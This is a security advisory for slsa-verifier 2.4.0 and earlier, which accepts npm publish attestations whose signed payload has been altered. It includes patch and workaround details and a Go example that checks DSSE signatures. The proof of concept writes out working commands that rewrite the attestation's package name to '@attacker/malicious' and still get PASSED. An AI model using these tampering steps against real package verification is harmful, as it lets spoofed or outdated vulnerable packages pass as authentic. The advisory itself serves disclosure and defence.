GHSA-r2xv-vpr2-42m9

Source
https://github.com/advisories/GHSA-r2xv-vpr2-42m9
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-r2xv-vpr2-42m9/GHSA-r2xv-vpr2-42m9.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-r2xv-vpr2-42m9
Published
2023-11-08T19:15:55Z
Modified
2024-08-21T14:57:07.559017Z
Summary
slsa-verifier vulnerable to improper validation of npm's publish attestations
Details

Summary

slsa-verifier <= 2.4.0 does not verify the signature on npm's publish attestations: it uses the DSSE envelope payload without checking that the envelope's signature actually covers it, so a modified payload is accepted as long as the provenance attestation still verifies.

Proof of concept

Steps to reproduce:

1. curl -Sso attestations.json $(npm view @trishankatdatadog/supreme-goggles --json | jq -r '.dist.attestations.url')
2. curl -Sso supreme-goggles.tgz "$(npm view @trishankatdatadog/supreme-goggles --json | jq -r '.dist.tarball')"
3. In attestations.json, take the value addressed by the jq selector .attestations[0].bundle.dsseEnvelope.payload, base64-decode it, tamper with it, base64-encode the result, and replace the original value with it. Save the file as attestations_tampered.json.
4. Here is an example command that replaces the subject's package name with @attacker/malicious (the -w0 flag is GNU base64 syntax): jq -r ".attestations[0].bundle.dsseEnvelope.payload = \"$(jq -r '.attestations[0].bundle.dsseEnvelope.payload | @base64d' < attestations.json | jq '.subject[0].name = "pkg:npm/%40attacker/malicious"' | base64 -w0)\"" < attestations.json > attestations_tampered.json
5. SLSA_VERIFIER_EXPERIMENTAL=1 slsa-verifier verify-npm-package supreme-goggles.tgz --attestations-path attestations_tampered.json --builder-id "https://github.com/actions/runner/github-hosted" --package-name "@trishankatdatadog/supreme-goggles" --package-version 1.0.5 --source-uri github.com/trishankatdatadog/supreme-goggles
6. The result is that slsa-verifier fails to detect this tampering of the publish attestation (unlike with the provenance attestation, whose signature is checked) and returns PASSED.

Impact

An attacker who controls which packages and attestations are shown to a user can associate a package with an arbitrary name and version that do not match what the user expects from the publish attestation. Furthermore, the package digest in the publish attestation need not match its counterpart in the provenance attestation. However, the attacker cannot associate the package with an arbitrary source or builder, because those are still bound by the provenance attestation, which is verified correctly. Thus the attacker could, for example, convince a package manager to install an authentic but older version of a package that contains known, exploitable vulnerabilities.

Severity is considered low because 1) it does not invalidate the provenance and 2) support for npm is currently experimental.

Patches

Fixed by PR #705 and released in versions >=2.4.1.

Workarounds

There is no easy way for users to remediate this vulnerability without upgrading, short of verifying the signature on npm's publish attestations themselves and cross-checking the attested package name, version and digest against GHA's provenance attestation and the downloaded tarball.
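The following is an added example, not code from slsa-verifier or from the advisory, showing the two checks the proof of concept and the workaround above turn on: recomputing the DSSE pre-authentication encoding (PAE) over the decoded payload and verifying the envelope signature against it, then checking that the verified statement's subject names the expected package and sha512. It assumes a locally generated ECDSA P-256 key as a stand-in for the Sigstore-issued signing key (real bundles carry a certificate that must additionally be chained to Fulcio and checked for Rekor inclusion, which is out of scope here), and the statement, package name and digest are constructed sample values. The TamperSubjectName helper reproduces step 4 of the PoC so the rejection can be observed.

```go
package main

import (
	"bytes"
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"encoding/base64"
	"encoding/json"
	"errors"
	"fmt"
	"strconv"
)

// Constructed sample values: the sha512 is a placeholder, not the real tarball digest, and
// sampleStatement is a minimal in-toto statement shaped like npm's publish attestation.
const (
	payloadType = "application/vnd.in-toto+json"
	pkgName     = "pkg:npm/%40trishankatdatadog/supreme-goggles@1.0.5"
	pkgSHA512   = "0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef"
	sampleStatement = `{"_type":"https://in-toto.io/Statement/v0.1","subject":[{"name":"` + pkgName +
		`","digest":{"sha512":"` + pkgSHA512 + `"}}],"predicate":{"version":"1.0.5"}}`
)

// Envelope is the subset of a DSSE envelope (bundle.dsseEnvelope in attestations.json) used here.
type Envelope struct {
	PayloadType string      `json:"payloadType"`
	Payload     string      `json:"payload"` // base64 of the in-toto statement
	Signatures  []Signature `json:"signatures"`
}

// Signature carries one base64-encoded ASN.1 ECDSA signature over the PAE.
type Signature struct {
	Sig string `json:"sig"`
}

// pae builds the DSSE pre-authentication encoding; the signature covers this, not the base64 text.
func pae(payloadType string, payload []byte) []byte {
	return []byte("DSSEv1 " + strconv.Itoa(len(payloadType)) + " " + payloadType +
		" " + strconv.Itoa(len(payload)) + " " + string(payload))
}

// Sign wraps stmt in an envelope signed by key, a local stand-in for the Sigstore-issued key.
func Sign(key *ecdsa.PrivateKey, stmt []byte) (Envelope, error) {
	h := sha256.Sum256(pae(payloadType, stmt))
	sig, err := ecdsa.SignASN1(rand.Reader, key, h[:])
	if err != nil {
		return Envelope{}, err
	}
	return Envelope{PayloadType: payloadType, Payload: base64.StdEncoding.EncodeToString(stmt),
		Signatures: []Signature{{Sig: base64.StdEncoding.EncodeToString(sig)}}}, nil
}

// VerifyEnvelope returns the decoded statement only if some signature verifies over the PAE of
// the decoded payload: the check that is missing for publish attestations in <= 2.4.0.
func VerifyEnvelope(env Envelope, pub *ecdsa.PublicKey) ([]byte, error) {
	payload, err := base64.StdEncoding.DecodeString(env.Payload)
	if err != nil {
		return nil, err
	}
	h := sha256.Sum256(pae(env.PayloadType, payload))
	for _, s := range env.Signatures {
		sig, err := base64.StdEncoding.DecodeString(s.Sig)
		if err == nil && ecdsa.VerifyASN1(pub, h[:], sig) {
			return payload, nil
		}
	}
	return nil, errors.New("dsse: no valid signature over payload")
}

// CheckSubject requires the verified statement to attest exactly the expected name and sha512.
// Running it on both the publish and the provenance statement with the same locally computed
// tarball digest is the cross-check described under Workarounds.
func CheckSubject(stmt []byte, wantName, wantSHA512 string) error {
	var st struct {
		Subject []struct {
			Name   string            `json:"name"`
			Digest map[string]string `json:"digest"`
		} `json:"subject"`
	}
	if err := json.Unmarshal(stmt, &st); err != nil {
		return err
	}
	for _, s := range st.Subject {
		if s.Name == wantName && s.Digest["sha512"] == wantSHA512 {
			return nil
		}
	}
	return fmt.Errorf("subject %s with sha512 %s not attested", wantName, wantSHA512)
}

// TamperSubjectName mirrors PoC step 4: rewrite the subject name inside the decoded payload,
// re-encode it and keep the original signature. A correct verifier must reject the result.
func TamperSubjectName(env Envelope, newName string) (Envelope, error) {
	payload, err := base64.StdEncoding.DecodeString(env.Payload)
	if err != nil {
		return Envelope{}, err
	}
	payload = bytes.ReplaceAll(payload, []byte(pkgName), []byte(newName))
	env.Payload = base64.StdEncoding.EncodeToString(payload)
	return env, nil
}

func main() {
	key, _ := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	env, _ := Sign(key, []byte(sampleStatement))
	bad, _ := TamperSubjectName(env, "pkg:npm/%40attacker/malicious")
	_, goodErr := VerifyEnvelope(env, &key.PublicKey)
	_, badErr := VerifyEnvelope(bad, &key.PublicKey)
	fmt.Println("genuine:", goodErr, "| tampered:", badErr)
}
```

The order matters: the subject is only trusted after VerifyEnvelope has returned it, never read straight from the base64 payload. Compute the sha512 of the downloaded tarball yourself and pass it to CheckSubject for both the publish statement and the provenance statement, so that a publish attestation naming a different package, version or digest than the provenance is caught even when each signature is individually valid.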

Database specific
{
    "nvd_published_at": null,
    "cwe_ids": [],
    "severity": "LOW",
    "github_reviewed": true,
    "github_reviewed_at": "2023-11-08T19:15:55Z"
}
Affected packages

Go / github.com/slsa-framework/slsa-verifier/v2

Package

Name
github.com/slsa-framework/slsa-verifier/v2
Purl
pkg:golang/github.com/slsa-framework/slsa-verifier/v2

Affected ranges

Type
SEMVER
Events
Introduced
0 (unknown introduced version; all previous versions are affected)
Fixed
2.4.1-rc.0

Database specific

{
    "last_known_affected_version_range": "<= 2.4.0"
}

Go / github.com/slsa-framework/slsa-verifier

Package

Name
github.com/slsa-framework/slsa-verifier
Purl
pkg:golang/github.com/slsa-framework/slsa-verifier

Affected ranges

Type
SEMVER
Events
Introduced
0 (unknown introduced version; all previous versions are affected)
Last affected
1.4.1